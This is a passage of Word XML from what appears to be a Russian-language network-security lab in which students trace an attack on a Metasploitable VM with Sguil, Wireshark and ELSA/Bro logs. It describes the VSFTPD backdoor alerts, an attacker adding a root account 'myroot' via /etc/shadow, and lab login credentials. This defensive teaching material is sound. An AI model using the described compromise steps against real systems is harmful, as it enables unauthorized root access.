    <w:p w14:paraId="0D9E0C0F" w14:textId="6A15BC93" w:rsidR="0073224A" w:rsidRDefault="0073224A" w:rsidP="0073224A">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EF03ABA" wp14:editId="07B944A2">
            <wp:extent cx="5485714" cy="1266667"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="Screenshot of the RealTime Events tab with Alert ID 5.2568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2C86" w14:textId="27DD6EE8" w:rsidR="00A44EA1" w:rsidRDefault="00752B4C" w:rsidP="00A44EA1">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Щелкните правой кнопкой мыши по цифре под заголовком CNT</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r w:rsidR="00885B74" w:rsidRPr="00885B74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>View Correlated Events (Просмотр связанных событий)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F13627F" w14:textId="0A8F65E4" w:rsidR="00A44EA1" w:rsidRDefault="00A44EA1" w:rsidP="00000B53">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="00A44EA1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A448C62" wp14:editId="5D2B031C">
            <wp:extent cx="3200400" cy="712520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="Picture 29" descr="Screenshot shows the result of right-clicking the CNT heading of the selected Alert. The option View Correlated Events is vis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918D1E1" w14:textId="01FFAFC0" w:rsidR="00B12758" w:rsidRPr="00B12758" w:rsidRDefault="00763D3B" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">На новой вкладке щелкните правой кнопкой мыши </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Alert ID (Идентификатор оповещения)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для одного из оповещений</w:t>
      </w:r>
      <w:r w:rsidR="00B12758">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> GPL ATTACK_RESPONSE id check returned root</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r w:rsidR="00B12758">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Transcript (Запись)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:t>этом примере используется оповещение</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>идентификатором 5.2570.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5EC8D5" w14:textId="2BCD7E85" w:rsidR="00AA3A97" w:rsidRDefault="00AA3A97" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA3A97">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="057B6D31" wp14:editId="62A66EA4">
            <wp:extent cx="3657600" cy="1143363"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="Picture 36" descr="Screenshot showing the selection of Transcript from View Correlated Ev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9080" w14:textId="2599DB22" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00D44F6A">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Просмотрите записи для всех таких оповещений. Последние оповещения на вкладке, вероятнее всего, покажут транзакции между Kali (хакер)</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>Metasploitable (цель) во время атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFF695" w14:textId="20A49233" w:rsidR="009F578E" w:rsidRDefault="00C132D6" w:rsidP="009F578E">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="00C132D6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4820DB2A" wp14:editId="6384FF96">
            <wp:extent cx="2971800" cy="2170958"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="39" name="Picture 39" descr="Screenshot shows the transcript for the ale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4471B" w:rsidRPr="0034471B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="648968F8" wp14:editId="563CC551">
            <wp:extent cx="2971800" cy="2166133"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="14" name="Picture 14" descr="Screenshot showing more of the transcript of the ale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00F9" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="0034471B">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Что произошло во время атаки?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B93EC9C" w14:textId="4885E17C" w:rsidR="000D258F" w:rsidRPr="000D258F" w:rsidRDefault="000D258F" w:rsidP="000D258F">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Хакер</w:t>
      </w:r>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> проводит </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>атаку</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>благодаря</w:t>
      </w:r>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> которой создает нов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">ую учетную </w:t>
      </w:r>
      <w:r w:rsidR="007C2DB0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">запись </w:t>
      </w:r>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">с правами </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> под именем «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>». Запись производится в каталог «/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D258F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2915B144" w14:textId="595922AB" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61FF4504" w14:textId="68A8B881" w:rsidR="0073224A" w:rsidRDefault="0073224A" w:rsidP="0073224A">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Перейдите на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC54D4" w14:textId="4C4CA638" w:rsidR="00137571" w:rsidRDefault="00411AFC" w:rsidP="00000B53">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Выберите оповещение, запись событий которого вы изучали на предыдущем шаге. Щелкните правой кнопкой мыши по идентификатору оповещения</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r w:rsidR="00137571">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:t>главном окне программы Wireshark отображается</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:t>представления пакета.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A276238" w14:textId="132FEC12" w:rsidR="00EB6B0B" w:rsidRDefault="00EB6B0B" w:rsidP="00137571">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB6B0B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30801C19" wp14:editId="59649D70">
            <wp:extent cx="4800600" cy="2405539"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="Picture 42" descr="Screenshot of Wireshark showing three views of a p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EA80" w14:textId="3201617F" w:rsidR="00137571" w:rsidRDefault="00F177C1" w:rsidP="00EB6B0B">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Для того чтобы просмотреть все пакеты, объединенные</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>сеансе TCP, щелкните правой кнопкой мыши по любому пакету</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r w:rsidR="00EA39B9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Follow TCP stream (Отслеживать поток TCP)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B46A446" w14:textId="2EBDD311" w:rsidR="007F6287" w:rsidRDefault="007F6287" w:rsidP="00137571">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="007F6287">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32351B75" wp14:editId="2F1D3732">
            <wp:extent cx="3657600" cy="2509883"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="44" name="Picture 44" descr="Screenshot shows the output of the Follow TCP Stream for a selected pa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84B" w14:textId="39F43A09" w:rsidR="0034471B" w:rsidRDefault="0034471B" w:rsidP="0034471B">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>Что вы увидели? Что обозначает красный</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>синий цвет текста?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399AC32D" w14:textId="5975CA43" w:rsidR="0034471B" w:rsidRPr="007C2DB0" w:rsidRDefault="007C2DB0" w:rsidP="0034471B">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Мы видим </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2DB0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">обмен информацией между машинами. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Красный цвет – команды, введенные атакующим. Синий цвет – информация от жертвы.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2DB0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F85016" w14:textId="3873B048" w:rsidR="001D1FFA" w:rsidRDefault="003F4ECE" w:rsidP="00895C2F">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выйдите из окна потока TCP. После просмотра информации </w:t>
      </w:r>
      <w:r w:rsidR="001D1FFA" w:rsidRPr="00895C2F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark </w:t>
      </w:r>
      <w:r>
        <w:t>закройте это приложение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E9FA46" w14:textId="37D24C6D" w:rsidR="0073224A" w:rsidRDefault="0073224A" w:rsidP="0073224A">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Используйте ELSA для перехода</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>журналам Bro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EF846C" w14:textId="3E5DEE05" w:rsidR="00FA2AD2" w:rsidRDefault="001D1FFA" w:rsidP="00781A46">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Вернитесь</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>Sguil. Щелкните правой кнопкой мыши по IP-адресу источника или назначения для одинакового оповещения</w:t>
      </w:r>
      <w:r w:rsidR="00FA2AD2" w:rsidRPr="001D1FFA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> GPL ATTACK_RESPONSE id check returned root</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r w:rsidR="00AF4FC8" w:rsidRPr="001D1FFA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ELSA IP Lookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00AF4FC8" w:rsidRPr="001D1FFA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DstIP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. По запросу ELSA введите имя пользователя </w:t>
      </w:r>
      <w:r w:rsidR="007F6287" w:rsidRPr="001D1FFA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">пароль </w:t>
      </w:r>
      <w:r w:rsidR="000568AE" w:rsidRPr="001D1FFA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF23FF" w14:textId="2086F106" w:rsidR="00A84764" w:rsidRPr="00A84764" w:rsidRDefault="00A84764" w:rsidP="00A84764">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если вы получили сообщение Your connection is not private (Ваше подключение не является частным), то щелкните </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ADVANCED (ДОПОЛНИТЕЛЬНО) &gt; Proceed to localhost (unsafe) (Перейти на локальный хост-компьютер (небезопасно))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для продолжения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2849012F" w14:textId="032D8762" w:rsidR="002A2F19" w:rsidRDefault="007F6287" w:rsidP="002A2F19">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="007F6287">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680F8451" wp14:editId="3C570046">
            <wp:extent cx="3886200" cy="1309665"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="45" name="Picture 45" descr="Screenshot of Sguil showing the options from right-clicking on Dst IP. ELSA IP Lookup and DstIP ar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2D3D" w14:textId="2CBABDED" w:rsidR="00A84764" w:rsidRDefault="0073224A" w:rsidP="00CA7A3A">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Нажмите </w:t>
      </w:r>
      <w:r w:rsidR="0093316E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>bro_notice</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C6C6D" w14:textId="60A85D3A" w:rsidR="00A84764" w:rsidRDefault="00286A54" w:rsidP="00063E79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32F44FAF" wp14:editId="246D4DA8">
            <wp:extent cx="5035550" cy="2639695"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="4" name="Picture 4" descr="Screenshot showing the bro_notic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E675E" w14:textId="7213DC76" w:rsidR="0093316E" w:rsidRDefault="00CA7A3A" w:rsidP="00CA7A3A">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Результат показывает, что узел 209.165.201.17 сканировал порты на узле 209.165.200.235, то есть на ВМ Metasploitable. Хакер, вероятно, нашел уязвимости на виртуальной машине Metasploitable, позволившие ему получить доступ туда.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1A1968" w14:textId="37DD3D35" w:rsidR="00CA7A3A" w:rsidRDefault="00CA7A3A" w:rsidP="00CA7A3A">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA7A3A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49745B15" wp14:editId="302FF306">
            <wp:extent cx="4572000" cy="2075089"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="51" name="Picture 51" descr="Screenshot shows output of bro_notice qu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E016" w14:textId="03C29F57" w:rsidR="00D16257" w:rsidRDefault="00D16257" w:rsidP="00D16257">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Если злоумышленник скомпрометировал Metasploitable, то теперь вам нужно определить эксплойт, который был использован</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>при помощи которого злоумышленник получил доступ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537BE2D7" w14:textId="6E77DCF5" w:rsidR="0073224A" w:rsidRDefault="0073224A" w:rsidP="0073224A">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:t>Вернитесь</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>Squil для изучения атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72603A10" w14:textId="61CCF73A" w:rsidR="003C7209" w:rsidRDefault="00C33F34" w:rsidP="00763D3B">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Перейдите</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>Sguil</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">щелкните вкладку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RealTime Events (События</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>реальном времени)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Найдите события </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ET EXLOIT VSFTPD Backdoor User Login Smiley</w:t>
      </w:r>
      <w:r>
        <w:t>. Эти события являются возможными эксплойтами</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>произошли во время несанкционированного доступа</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>правами root.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:t>этом примере используется оповещение</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>идентификатором 5.2567.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B0ED8" w14:textId="6B73A917" w:rsidR="00763D3B" w:rsidRDefault="00763D3B" w:rsidP="00D16257">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r w:rsidRPr="00763D3B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1663EBAA" wp14:editId="0A3FD36C">
            <wp:extent cx="5486400" cy="1156607"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="53" name="Picture 53" descr="Screenshot showing the Real Time Events tab with Alert ID 5.2567 highlighted as a possible explo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F59E" w14:textId="32ADFFA0" w:rsidR="005D50B0" w:rsidRDefault="00454308" w:rsidP="00763D3B">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Щелкните правой кнопкой мыши по номеру под заголовком CNT</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r w:rsidR="005D50B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>View Correlated Events (Просмотр связанных событий)</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы просмотреть все связанные события. Выберите оповещение</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>идентификатором, который начинается</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>5. Это оповещение собрало информацию</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>датчика на интерфейсе seconion-eth1-1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADCF1BD" w14:textId="460CBD45" w:rsidR="00763D3B" w:rsidRDefault="008D319F" w:rsidP="00763D3B">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>В новой вкладке со всеми связанными событиями щелкните правой кнопкой мыши идентификатор оповещения</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="00763D3B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Transcript (Запись)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для подробного просмотра каждого оповещения.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:t>этом примере используется оповещение</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>идентификатором 5.2569. Самые последние оповещения, вероятнее всего, будут содержать операции передачи данных по TCP между злоумышленником</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>жертвой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408E0217" w14:textId="33B17B88" w:rsidR="005D1040" w:rsidRDefault="00763D3B" w:rsidP="00763D3B">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
      </w:pPr>
      <w:r w:rsidRPr="00763D3B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36D75C9E" wp14:editId="42A005E8">
            <wp:extent cx="4572000" cy="2196646"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="Picture 54" descr="Screenshot showing the Correlated Events and the Transcript of a selected al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F14B" w14:textId="392BBF58" w:rsidR="00454308" w:rsidRDefault="000A42A8" w:rsidP="005D1040">
      <w:pPr>
